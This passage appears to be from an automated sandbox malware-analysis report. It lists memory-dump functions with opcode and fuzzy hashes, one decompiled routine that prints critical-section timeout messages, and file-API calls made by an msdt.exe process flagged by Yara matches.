                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                    • Instruction Fuzzy Hash: E9C01236080248BBCB126E82CC00F1A7B2AFBA4B60F008015BA080A5B08632E970EA84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01483A1C, Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                    • Instruction ID: a79dcaf120a7db183ba53af8713781511c5c4b7fbe5b9d3d314bd4a8c048fa3f
                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                    • Instruction Fuzzy Hash: AFC08C32080248BBC7126E42DC00F057B29E7A0B60F040021B6080A9708636EC60D588
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0146AD30, Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                    • Instruction ID: fa575cbd2e23c15f4fb6565550a3068377f958f9cebe54a500ac0f3fe36fddc8
                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                    • Instruction Fuzzy Hash: 87C08C32080248BBC7127A46CD00F057B29E7A0B60F100021BA040A6718932E860D588
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014936CC, Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                    • Instruction ID: aefe25c69c364d33cc47824e025a9360a4f86f111a53161ce6f906f301b78685
                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                    • Instruction Fuzzy Hash: A5C02B70150440FBDB352F30CD00F1D7654F710A21F6803587224459F0E63C9C00D100
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014776E2, Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                    • Instruction ID: 78d9dcb4103dc9380bf2f31b24806ec32fba541e36cd9b76465219f3d2d36595
                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                    • Instruction Fuzzy Hash: 8AC08C701411805AEB2A670CCE28B263A50AB1861AF98019DAB09096B2C378B823C208
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01487D50, Relevance: .0, Instructions: 7COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                    • Instruction ID: 6a67b19b361d16ec2ca79ac5f98ed47bf9e914f1a4faa71b99ca618cc074e96d
                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                    • Instruction Fuzzy Hash: CFB092353019408FCE16EF18C090B1A33E4BB44A40B9400D0E400CBA31D229E8008900
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01492ACB, Relevance: .0, Instructions: 5COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                    • Instruction ID: 172dd3537688945c8b3ffe7b9eb5b281ff353e63a26db422385a40d9ea03a24b
                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                    • Instruction Fuzzy Hash: 27B01232C10441CFCF02EF40CA10B697735FB10750F0544D6900137930C238AC01CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9950, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6dbd5da01a76633272171135eef9c56b9a58dabaa31640b948a5a53fe98849b7
                    • Instruction ID: 3d5b58945a28f1dd2aa54408ac368e1378f871f54ca0ae938d163b30e721a47a
                    • Opcode Fuzzy Hash: 6dbd5da01a76633272171135eef9c56b9a58dabaa31640b948a5a53fe98849b7
                    • Instruction Fuzzy Hash: 1D9002A160140403D180659948446470015E7D0346F51C462A2054556ECB799C517175
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A99D0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7319219427bc9229f419310cee09a2d89db7aa623d76bdabb67b081a55bf54dc
                    • Instruction ID: c313959da653a9c2e08074aba2589f481f2fad8fd4cdd04e1518d78f3d101c44
                    • Opcode Fuzzy Hash: 7319219427bc9229f419310cee09a2d89db7aa623d76bdabb67b081a55bf54dc
                    • Instruction Fuzzy Hash: 609002A161100043D144619944447460055E7E1245F51C463A2144555CC6799C616175
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014AB040, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3051cf2d5c976522538e8be0c20949ab50a7a17dba5ffc8bc492b6484c7a40e4
                    • Instruction ID: 99406a2f798059833a520035d3a802a81435038c635a8aea1e7e8255bcb8fe6e
                    • Opcode Fuzzy Hash: 3051cf2d5c976522538e8be0c20949ab50a7a17dba5ffc8bc492b6484c7a40e4
                    • Instruction Fuzzy Hash: A59002A1A01140434580B19948444465025F7E1345391C572A0444561CC7B89855A2B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9820, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f938039d090fb7c321f04b3e656af3cdf081bca9bd9c6cd8f2623ccadd7b916
                    • Instruction ID: febe4d65638bfe3980fbcbd169f1b204ae95e2cf7d32987310066ff0b2381b9c
                    • Opcode Fuzzy Hash: 3f938039d090fb7c321f04b3e656af3cdf081bca9bd9c6cd8f2623ccadd7b916
                    • Instruction Fuzzy Hash: 8690027164100403D181719944446460019F7D0285F91C463A0414555EC7A59A56BAB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A98A0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b1b6f132698aa5c38830b64682318cf327306d144e45cf39afe05a0de0842def
                    • Instruction ID: 3801fcf5ead539bbbfa0ac583fb57cea50c92c648814b5e661bea32df9d15867
                    • Opcode Fuzzy Hash: b1b6f132698aa5c38830b64682318cf327306d144e45cf39afe05a0de0842def
                    • Instruction Fuzzy Hash: 2D90026170100403D142619944546460019E7D1389F91C463E1414556DC7759953B172
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9B00, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f37ea23eeed892b848a38e983e9e3d13ffacf46d52aa0a355212493c3707022
                    • Instruction ID: 593b439e395fe89e4cf9ca4c7a11fc53083a2ff6e6fd30d4fa2f196df2db9dd1
                    • Opcode Fuzzy Hash: 3f37ea23eeed892b848a38e983e9e3d13ffacf46d52aa0a355212493c3707022
                    • Instruction Fuzzy Hash: 7890026164100803D180719984547470016E7D0645F51C462A0014555DC766996576F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014AA3B0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d6ab4a16a4456df8df383aa705f1235a46ef011921072305ecdaf508420c21d8
                    • Instruction ID: 2223c9e758e815227323e1127b63d24647c7bb93f4378bc18c12eec669a6ede0
                    • Opcode Fuzzy Hash: d6ab4a16a4456df8df383aa705f1235a46ef011921072305ecdaf508420c21d8
                    • Instruction Fuzzy Hash: 3790027160144003D1807199848464B5015F7E0345F51C862E0415555CC7659856A271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9A10, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bac4fc5d724703390db17225c0913d8c0a82726e54b60283f0baabf2adb0efee
                    • Instruction ID: 19bd84624d1df83d8aa72203192b7a95602202f3afcf8fcd8faa88a76d486694
                    • Opcode Fuzzy Hash: bac4fc5d724703390db17225c0913d8c0a82726e54b60283f0baabf2adb0efee
                    • Instruction Fuzzy Hash: 9590027160140403D140619948487870015E7D0346F51C462A5154556EC7B5D8917571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9A80, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: da8c77b78475d0c8a8c69cc850e8741378a8b5be9d375179115d3797489cc681
                    • Instruction ID: bf4c68ce4dec676983e1f44406f91d6b763581cf3e5ea5429413a91306060d53
                    • Opcode Fuzzy Hash: da8c77b78475d0c8a8c69cc850e8741378a8b5be9d375179115d3797489cc681
                    • Instruction Fuzzy Hash: C790026160144443D18062994844B4F4115E7E1246F91C46AA4146555CCA6598556771
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9560, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e31c3b018260a0636c3e8df75d13f64850b555a74a5e056aa86f1f8deed85cb
                    • Instruction ID: 8f0c18373c89513cb5314b1823b1d852493b825c6ebb6418411e648e3681db8f
                    • Opcode Fuzzy Hash: 8e31c3b018260a0636c3e8df75d13f64850b555a74a5e056aa86f1f8deed85cb
                    • Instruction Fuzzy Hash: C5900265621000030185A599064454B0455F7D6395391C466F1406591CC77198656371
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9520, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a6464b5fc12e063a3d8750ac14e1ee210d0219177ea93261b5249b90fac2f762
                    • Instruction ID: e0227dfa542fb73a314269f364f56cab3d94f0709dfe45712c8bfb666eef99a8
                    • Opcode Fuzzy Hash: a6464b5fc12e063a3d8750ac14e1ee210d0219177ea93261b5249b90fac2f762
                    • Instruction Fuzzy Hash: 549002E1601140934540A2998444B4A4515E7E0245B51C467E1044561CC6759851A175
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014AAD30, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3fb70ea1b5801a8944520dbe88cc55203988deda9e4a5eec450921e0f3fb842a
                    • Instruction ID: 17ccabcd851d9cefe895ea304dce69338482b1a51cc783663b8a2ad3d52c6cf4
                    • Opcode Fuzzy Hash: 3fb70ea1b5801a8944520dbe88cc55203988deda9e4a5eec450921e0f3fb842a
                    • Instruction Fuzzy Hash: DE900271E05000139180719948546864016F7E0785B55C462A0504555CCAA49A5563F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A95F0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4ce76d39ff1ab3eaa07172578ee81e4c601e5b1e90616394095a45baccaa4dda
                    • Instruction ID: 7685c7a7a93905f1fb958dfd9f54666b417608ea853eda998980f0f1130a65a5
                    • Opcode Fuzzy Hash: 4ce76d39ff1ab3eaa07172578ee81e4c601e5b1e90616394095a45baccaa4dda
                    • Instruction Fuzzy Hash: F790027160100803D144619948446C60015E7D0345F51C462A6014656ED7B598917171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9760, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 218557be1bac4b812b6c106ad4e902df773a0ec9650d92a106546d688f47fbe0
                    • Instruction ID: 0b8f8c63b7001f2a7f598f922ef81b1d468451ce845774cb95e515e289e3760e
                    • Opcode Fuzzy Hash: 218557be1bac4b812b6c106ad4e902df773a0ec9650d92a106546d688f47fbe0
                    • Instruction Fuzzy Hash: AA90027160100403D140619955487470015E7D0245F51D862A0414559DD7A698517171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014AA770, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 23aaa3399a7e55f79a91dd68e9b6ff0ebd05fa99af0f099d7610dcc7cae5d6d8
                    • Instruction ID: 1ab43b7149fefae6cfa85a35a2d92f0208a1cdbd3ec3fafc5acd17e5eee3576b
                    • Opcode Fuzzy Hash: 23aaa3399a7e55f79a91dd68e9b6ff0ebd05fa99af0f099d7610dcc7cae5d6d8
                    • Instruction Fuzzy Hash: 4A90027560504443D54065995844AC70015E7D0349F51D862A041459DDC7A49861B171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9770, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 40736f614a8b592c9b2f70f7a174c655a264b5b9a203db44eca0ac89ed06b6a9
                    • Instruction ID: 7d6259df2464310893ea43b9c7b405de516876e78cee369d343c268a1e38b4e2
                    • Opcode Fuzzy Hash: 40736f614a8b592c9b2f70f7a174c655a264b5b9a203db44eca0ac89ed06b6a9
                    • Instruction Fuzzy Hash: E890026160504443D14065995448A460015E7D0249F51D462A1054596DC7759851B171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014AA710, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 993988f098d6c6a5dbd1dfa18110942a4b80265a29af60db7267537e5d47de6f
                    • Instruction ID: e6f7d3f95d9f92fddf92ef5fe74ce078107c4c2eb97e86e4e1750839d365e717
                    • Opcode Fuzzy Hash: 993988f098d6c6a5dbd1dfa18110942a4b80265a29af60db7267537e5d47de6f
                    • Instruction Fuzzy Hash: D8900271701000539540A6D95844A8A4115E7F0345B51D466A4004555CC6A498616171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9730, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 10bd5c0226cef3676daccbe1016ee968ec989f9aec9bd3dce8d120ac090aef65
                    • Instruction ID: ab30019298105d4a3d3449579f9bb533096d7e43a94b7e78cad4421a3adc4938
                    • Opcode Fuzzy Hash: 10bd5c0226cef3676daccbe1016ee968ec989f9aec9bd3dce8d120ac090aef65
                    • Instruction Fuzzy Hash: 21900261A0500403D180719954587460025E7D0245F51D462A0014555DC7A99A5576F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9FE0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 88958dcf8ec8d66d6c31b6e81ddce877f726273910787721aaface0af71ba31e
                    • Instruction ID: 6e255883199cebc5a00b5e87856b6bc8ea405d51a936c59cbb59a82bab0fcb4a
                    • Opcode Fuzzy Hash: 88958dcf8ec8d66d6c31b6e81ddce877f726273910787721aaface0af71ba31e
                    • Instruction Fuzzy Hash: A890027171114403D150619984447460015E7D1245F51C862A0814559DC7E598917172
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9650, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb9557d0f40ae7e33c3497d96f3296e9d59c2efb0a040a7d4c51976b98997508
                    • Instruction ID: bad8fdde087b9e40766bd3fde3df93a49ef39481930ac4fe91499508bc25c278
                    • Opcode Fuzzy Hash: fb9557d0f40ae7e33c3497d96f3296e9d59c2efb0a040a7d4c51976b98997508
                    • Instruction Fuzzy Hash: EC90027160504843D18071994444A860025E7D0349F51C462A0054695DD7759D55B6B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9610, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f218ec71850e551e11509d7ae3b3af160f09e9bf1adfb4eabcf0c34b1cfc3bf5
                    • Instruction ID: 1486a7bc70a62528884460f14a07fd603578784b7bad480adb868565d18e8f3f
                    • Opcode Fuzzy Hash: f218ec71850e551e11509d7ae3b3af160f09e9bf1adfb4eabcf0c34b1cfc3bf5
                    • Instruction Fuzzy Hash: 7A900271A0500803D190719944547860015E7D0345F51C462A0014655DC7A59A5576F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A96D0, Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2af9cfe467b971187d0157c2f9a8ebeda5bf7fe175f7758bc5145aab0ce21145
                    • Instruction ID: f17bf47e1373a30742d99b5a04bf88cbdbcb8fc2b6b4233a47c19786d849247e
                    • Opcode Fuzzy Hash: 2af9cfe467b971187d0157c2f9a8ebeda5bf7fe175f7758bc5145aab0ce21145
                    • Instruction Fuzzy Hash: A690027160100843D14061994444B860015E7E0345F51C467A0114655DC765D8517571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9670, Relevance: .0, Instructions: 2COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction ID: 21946fd80ecee1cafc0fff945da5a70dc6128ed7c3ccf4d240187af48a0eac2c
                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014FFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                    Download Yara Rule
                    C-Code - Quality: 53%
                    			E014FFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E014ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E014F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E014F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                    0x014ffdda
                    0x014ffde2
                    0x014ffde5
                    0x014ffdec
                    0x014ffdfa
                    0x014ffdff
                    0x014ffe0a
                    0x014ffe0f
                    0x014ffe17
                    0x014ffe1e
                    0x014ffe19
                    0x014ffe19
                    0x014ffe19
                    0x014ffe20
                    0x014ffe21
                    0x014ffe22
                    0x014ffe25
                    0x014ffe40

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014FFDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014FFE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014FFE01
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: 056674a54286cf0bb6b8720cc0f27992469020168de3cff6c43fa7d4082e209e
                    • Instruction ID: 6f38a4e33d4b8ca435c77f2c035d21085456e199ad9248e41c264b461aa2ba87
                    • Opcode Fuzzy Hash: 056674a54286cf0bb6b8720cc0f27992469020168de3cff6c43fa7d4082e209e
                    • Instruction Fuzzy Hash: 52F0C832540101BBE7201A46DC01E237F5ADB54730F24021EF724556F1D972B82086A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Analysis Process: msdt.exe PID: 7056 Parent PID: 3440 msdt.exeCOMMON

                    Executed Functions

                    Function 0071A360, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00714BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00714BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0071A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction ID: 563851f3ce8e03a38bc7586c1d02f8da15045e2669d38431aa18680db76dfc61
                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction Fuzzy Hash: 85F0BDB2201208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0071A40A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jq,FFFFFFFF,?,rMq,?,00000000), ref: 0071A455
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1Jq
                    • API String ID: 2738559852-4152144016
                    • Opcode ID: 3b64409855d51beab7a2484172b630d8b035c7d66292ae0b4cfa7e96f7101326
                    • Instruction ID: 9c2ea8929cb964f911ae0300bfee50700c062439d59a2cb3e6f64fe399394eb0
                    • Opcode Fuzzy Hash: 3b64409855d51beab7a2484172b630d8b035c7d66292ae0b4cfa7e96f7101326
                    • Instruction Fuzzy Hash: 8FF0F4B2200108ABCB14DF88DC80EEB77ADEF8C754F158648BE0DA7241C630ED51CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0071A410, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jq,FFFFFFFF,?,rMq,?,00000000), ref: 0071A455
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1Jq
                    • API String ID: 2738559852-4152144016
                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction ID: 566e72f981a2e999b450a0f5b0a81a0277e3e6e91364a258fbfd70aade502a11
                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction Fuzzy Hash: 59F0A4B2200208ABCB14DF89DC85EEB77ADEF8C754F158248BA1D97241D630E8518BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0071A490, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtClose.NTDLL(PMq,?,?,00714D50,00000000,FFFFFFFF), ref: 0071A4B5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID: PMq
                    • API String ID: 3535843008-4045965120
                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction ID: e8d67d489e0b4a1984a1af9200878e53034621a65f9458c72731ed98ce2b702e
                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction Fuzzy Hash: D3D01275200214BBD710EB98CC45ED7776CEF44760F154455BA1C5B242C530F50086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

